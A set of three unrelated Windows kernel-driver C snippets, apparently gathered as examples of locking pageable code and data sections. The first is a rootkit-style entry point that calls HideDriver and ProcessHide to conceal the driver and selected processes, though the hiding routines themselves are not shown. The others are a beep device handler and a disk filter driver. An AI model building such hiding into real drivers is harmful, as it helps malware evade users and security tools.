NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath) { DriverObject->DriverUnload=DriverUnload; g_hCode=MmLockPagableCodeSection(&IsProcessHidden); g_hData=MmLockPagableDataSection(&g_hCode); if (!(ProcessNameOffset = GetProcessNameOffset())) { UnlockSections(); return STATUS_UNSUCCESSFUL; } HideDriver(DriverObject); if (!NT_SUCCESS(ProcessHide(IsProcessHidden))) { UnlockSections(); return STATUS_UNSUCCESSFUL; } return STATUS_SUCCESS; }
NTSTATUS NTAPI BeepCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp) { PDEVICE_EXTENSION DeviceExtension = DeviceObject->DeviceExtension; /* Acquire the mutex and increase reference count */ ExAcquireFastMutex(&DeviceExtension->Mutex); if (++DeviceExtension->ReferenceCount == 1) { /* First reference, lock the data section */ DeviceExtension->SectionHandle = MmLockPagableDataSection(BeepCreate); } /* Release it */ ExReleaseFastMutex(&DeviceExtension->Mutex); /* Complete the request */ Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT); return STATUS_SUCCESS; }
NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath ) { ULONG ulIndex; PDRIVER_DISPATCH * dispatch; // // Remember registry path // DiskPerfRegistryPath.MaximumLength = RegistryPath->Length + sizeof(UNICODE_NULL); DiskPerfRegistryPath.Buffer = ExAllocatePool( PagedPool, DiskPerfRegistryPath.MaximumLength); if (DiskPerfRegistryPath.Buffer != NULL) { RtlCopyUnicodeString(&DiskPerfRegistryPath, RegistryPath); } else { DiskPerfRegistryPath.Length = 0; DiskPerfRegistryPath.MaximumLength = 0; } // // Create dispatch points // for (ulIndex = 0, dispatch = DriverObject->MajorFunction; ulIndex <= IRP_MJ_MAXIMUM_FUNCTION; ulIndex++, dispatch++) { *dispatch = BlkMovSendToNextDriver; } // _asm{int 3} // // Set up the device driver entry points. // DriverObject->MajorFunction[IRP_MJ_CREATE] = BlkMovCreate; DriverObject->MajorFunction[IRP_MJ_READ] = BlkMovReadWrite; DriverObject->MajorFunction[IRP_MJ_WRITE] = BlkMovReadWrite; DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = BlkMovDeviceControl; // DriverObject->MajorFunction[IRP_MJ_SYSTEM_CONTROL] = DiskPerfWmi; DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] = BlkMovShutdownFlush; DriverObject->MajorFunction[IRP_MJ_FLUSH_BUFFERS] = BlkMovShutdownFlush; DriverObject->MajorFunction[IRP_MJ_PNP] = BlkMovDispatchPnp; DriverObject->MajorFunction[IRP_MJ_POWER] = BlkMovDispatchPower; DriverObject->DriverExtension->AddDevice = BlkMovAddDevice; DriverObject->DriverUnload = BlkMovUnload; KeInitializeSpinLock(&g_IrpSpinLock); MmLockPagableCodeSection(BlkMovReadWrite); MmLockPagableDataSection(&g_MovingGroup); MmLockPagableDataSection(&g_pMoverData); MmLockPagableDataSection(&g_bEnableProtect); MmLockPagableDataSection(&g_FinalGroup); return(STATUS_SUCCESS); } // end DriverEntry()